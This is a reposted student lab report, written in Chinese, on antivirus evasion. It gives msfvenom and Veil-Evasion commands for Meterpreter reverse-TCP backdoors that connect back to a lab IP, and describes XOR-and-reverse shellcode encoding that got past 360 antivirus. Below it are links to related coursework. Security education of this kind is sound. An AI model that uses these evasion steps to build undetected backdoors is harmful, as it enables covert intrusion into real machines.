20145120黄玄曦《网络对抗》免杀原理与实践

最新推荐文章于 2024-06-13 08:44:35 发布
最新推荐文章于 2024-06-13 08:44:35 发布
阅读量65 收藏
点赞数
文章标签: 运维
原文链接:http://www.cnblogs.com/20145120hxx/p/6629029.html
版权

20145120黄玄曦《网络对抗》免杀原理与实践

基础问题回答

  1. 杀软是如何检测出恶意代码的?

    • 基于特征码的检测
      杀软公司通过分析恶意代码,找到恶意代码都有,而正常代码少有的特征代码,用这些已知的特征码与代码匹配检测,出错率低。
    • 启发式恶意软件检测、基于行为的恶意软件检测
      指导教材上说的很明白了,“对恶意软件检测来说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件吧。”但这种方式出错率相对高。容易误杀。

  2. 免杀是做什么?
    通过技术手段使恶意代码不被杀毒软件查杀。

  3. 免杀的基本方法有哪些?
    加壳、用其他语言重新编译、加冗余代码混淆真正的恶意代码、用社会工程学的欺骗手段伪装成用户信任的软件等等。

实践过程

一个不断生成后门软件,使用网站www.virscan.org和本机的杀软扫描的过程

使用MSF生成后门程序

使用编码器编码10次,上课的时候就知道MSF因为太出名基本被分析透了,针对MSF所有解码器都有特征码,啊哈,果然不出所料被查了
885218-20170327214557779-1208033883.png
885218-20170327214606686-151987188.png
隔离区捞出来放到virscan上,嗯,53%
885218-20170327214645826-4951174.png

使用Veil-Evasion生成后门程序

老师的kali虚拟机自带,不用自己下载,输入veil-evasion进入

依次输入

use python/meterpreter/rev_tcp
set LHOST 192.168.253.129
set LPORT 5120
generate
testVeil5120
1

生成后门程序,拖到主机里还是直接查到,懒得从隔离区捞出来了,机智地直接在kali中上传扫描。
885218-20170327214809498-515839636.png
885218-20170327214817358-817261379.png
885218-20170327214823592-185930627.png

试用了一下发现前面的ip输错了。。。输成了235。。。

C语言使用shellcode

平台win10+vs2015

输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.129 LPORT=5120 -f c生成需要的机器码数组

复制到vs中,然后通过逆序、异或51h生成一段shellcode
运行一下360就把它杀了。。。
885218-20170327214959342-1191346476.png

还好代码已经按我的想法以16进制格式输出到txt文件中了,替换掉部分产生的ffffff后得到新的机器码

新建项目,用生成的16进制代码&老师给的样例代码编程,其实就是加了个解码器,然后把解码出来的数组用作样例的met数组
很神奇,一开始不行,我试了很多次还是不行,但后来重启机器之后就成功了,运行一下,回连成功,360没报毒
885218-20170327233252983-979583795.png

改个名字传到virscan上,再用360直接查一下,嗯,没毛病,免杀成功
885218-20170327234128264-187628677.png
virscan结果只有两个查到了
885218-20170327234819795-1559138957.png
哇哦!这nod32厉害啊,15年的病毒库都能知道我是32位win木马,总的来说这次实验还是很成功的
885218-20170327234832217-1403135967.png

转载于:https://www.cnblogs.com/20145120hxx/p/6629029.html

weixin_30539625
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20145120黄玄曦网络对抗》Web安全基础实践
weixin_30732825的博客
05-17 94
20145120黄玄曦网络对抗》Web安全基础实践 回答问题 (1)SQL注入攻击原理,如何防御 SQL注入原理简单地说大概是,通过构造特殊的SQL命令提交表单,让服务器执行构造的恶意SQL命令,以对数据库进行恶意操作。 服务器前端可以通过限制用户输入的长度,检测用户输入的内容(例如#,--,1=1等敏感的代码)等方法防止SQL注入,后台程序也可以再检测一遍前端传过来的内容,数据库中存放的一些数...
20145120黄玄曦网络对抗》恶意代码分析
weixin_30300225的博客
04-04 72
20145120黄玄曦网络对抗》恶意代码分析 Windows计划任务schtasks 在命令提示符输入schtasks /create /TN netstat /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"新建计划任务 新建netstatlog.bat文件,内容如下: date /t >> c:\net...
20145120黄玄曦网络对抗》信息搜集与漏洞扫描
weixin_30569153的博客
04-22 76
20145120黄玄曦网络对抗》信息搜集与漏洞扫描 问题回答 (1)哪些组织负责DNS,IP的管理:(百度一下这问题出来了好多同学的博客。。。笑哭) 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器、DNS和IP地址管理。 全球根域名服务器:绝大多数在欧洲和北美(全球13台,用A~M编号),中国仅拥有镜像服务器(备份)。 全球一共有5个地区性注册机构:ARIN主要负责北...
20145120黄玄曦网络对抗》Web基础
weixin_30251587的博客
05-08 72
20145120黄玄曦网络对抗》Web基础 回答问题 (1)什么是表单 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或...
20145120黄玄曦网络对抗》MSF基础应用
weixin_30352645的博客
04-16 58
20145120黄玄曦网络对抗》MSF基础应用 准备工作 本来决定就是老师提供的XP虚拟机了,做着做着发现因为打补丁以及语言的问题,需要另外的虚拟机。 求来了不那么健壮的虚拟机,环境如下: 实践部分 (1)主动攻击:MS08_067 从实验指导exploit/windows/smb/ms08_067_netapi易知,MS08_067这个漏洞是属于Windows平台对SMB协议的攻击 进入/...
20145120黄玄曦网络攻防》网络欺诈技术防范
weixin_30725315的博客
05-01 87
20145120黄玄曦网络攻防》网络欺诈技术防范 回答问题 (1)通常在什么场景下容易受到DNS spoof攻击 不同局域网要实现DNS攻击难度很大,通常在同一局域网内容易受到攻击,例如商店、饭店公开的wifi之类的 (2)在日常生活工作中如何防范以上两攻击方法 不要连公开wifi,不要打开可疑链接,用安全浏览器(例如360,可以看到网页信息,真的网站360会显示安全) 真网站 假网站 实验...
20145120黄玄曦《计算机病毒》高级静态分析
weixin_30357231的博客
05-22 70
20145120黄玄曦《计算机病毒》高级静态分析 1 PSLIST导出函数做了什么? 从EXPORT窗口双击查看PSLIST函数 发现其调用如下图函数,上面一个判断当前的平台(与WIN32比较),操作系统版本(与VISTA比较) 调用API(CreateToolhelp32Snapshot)获取进程列表,配合其他API达到发送进程列表到远端或寻找某个特定进程的目的 2 使用图模式绘制出s...
20145120黄玄曦《计算机病毒》动静态分析结合
weixin_30563917的博客
05-30 81
20145120黄玄曦《计算机病毒》动静态分析结合 用各种工具对9-3.exe分析,并回答问题 1 该程序导入了哪些DLL 用PEid查看导入表(或PEexplore),导入了KERNEL32,NETAPI,DLL1,DLL2等4个dll 用IDA分析,因为动态导入会用到loadLibrary函数,查看该函数交叉引用,可见导入了DLL3,USER32等两个dll 2 三个DLL要求的基地...
20145120黄玄曦 《java程序设计》 寒假学习总结
weixin_30500105的博客
02-25 48
1和2.我对未来规划不多,我认为好好学习积累知识能帮助我应对未来的挑战,这是我的学习动力之一,此外,了解新知识满足好奇心也是我的主要的学习动力。 3.我认为专业课学习比公务员考试重要,我认为专业知识是我们的基础,若专业课学不好,即使侥幸通过了公务员考试,也不能很好地完成以后的工作。 4.我感觉自己还没有做出特别成功的事,不过我认为想要做好一件事就首先需要的是专注和兴趣。 5.我对《java程...
rsync文件同步
翡翠泪滴的博客
06-11 788
1、rsync 全名 Remote Sync,是类 UNIX 系统下的数据镜像备份工具。可以方便的实现本地、远程备份,rsync 提供了丰富的选项来控制其行为。(1)Remote Sync, 远程同步 端口 873(2)支持本地复制,或者与其他SSH、rsync 主机同步(3)官方网站:https://rsync.samba.org/
mac读不出来ntfs mac硬盘读不出来盘
2401_82916694的博客
06-08 453
大家可以按照以上方法尝试修复mac读不出来ntfs,mac硬盘读不出来盘的问题,但在故障修复过程中,一些分区恢复操作可能导致文件数据丢失,这里比较建议选择磁盘工具或靠谱的第三方磁盘管理工具,如Tuxera NTFS For Mac软件进行检测与修复。如果是Mac系统设置问题,用户可以选择打开Mac“访达”窗口,点击打开左上角访达的“偏好设置”,随后在“边栏”设置中勾选显示“硬盘”和“外置磁盘”,这样就可以看到挂载硬盘的各个分卷盘了。图4:显示硬盘和外置磁盘。图5:从恢复模式修复磁盘。图3:查看挂载点列表。
安装 JDK 17
chengkai730的博客
06-08 355
安装 JDK 17
简单的项目部署脚本(转载)
u010230019的博客
06-09 608
有些项目团队喜欢使用docker启动java服务,那么我们同样可以将上述脚本稍做改造,来实现基于shell+docker的简单项目部署能力。可以将核心节点的错误或者失败内容通过webhook发送到对应的告警平台,比如钉钉、飞书机器人等。把~/.ssh/id_rsa.pub内容添加到远程仓库的ssh秘钥中。执行start.sh脚本打包部署。start.sh脚本内容。
《软件定义安全》之八:软件定义安全案例
最新发布
大龄IT民工
06-13 1086
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
mysql中 redo日志(下)
qq_41534540的博客
06-08 685
大家好。上篇文章我们介绍了什么是redo日志以及redo日志的写入过程。建议没看过上篇文章的同学先看一下《mysql那些事儿》之 redo日志(上),今天我们继续来说一说redo日志。
【Git】Windows下使用可视化工具Sourcetree
qq_45306739的博客
06-10 349
登录码云Gitee.com,在右上角我的主页–个人设置–安全设置–SSH公钥,将刚才的内容添加进去,输入密码检查后则会添加成功,该计算机本地则与云端仓库建立关联。首先安装Git,然后将本地和远端仓库建立联系,无论是Windows还是Linux下的工具只是将Git命令可视化。之前文章介绍过Linux系统中的Git工具:git cola。跳过Install的登录,直接一路安装,选择安装Git。如果第一次链接出现警告,输入yes验证后即可成功。用记事本打开id_rsa.pub,复制所有内容。
现代操作系统(第四版)课后习题-5.输入/输出
qq_39071254的博客
06-09 1375
现代操作系统(第四版)课后习题-5.输入/输出
python操作jenkins
weixin_42836297的博客
06-12 138
参考链接: python操作jenkins
ipv6有状态分配地址
buhuidage的博客
06-09 219
设备在获取IPv6地址等信息时,会先发送RS报文请求链路上的路由设备,路由设备受到RS报文后会发送相应的RA报文来表示自身能够提供的IPv6服务类型。M/O都为1,无状态分配,地址和DNS等都从DHCPv6服务器取得。会有dhcpv6四步交互(对应ipv4的dhcp四步交互)对应的报文(icmpv6)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值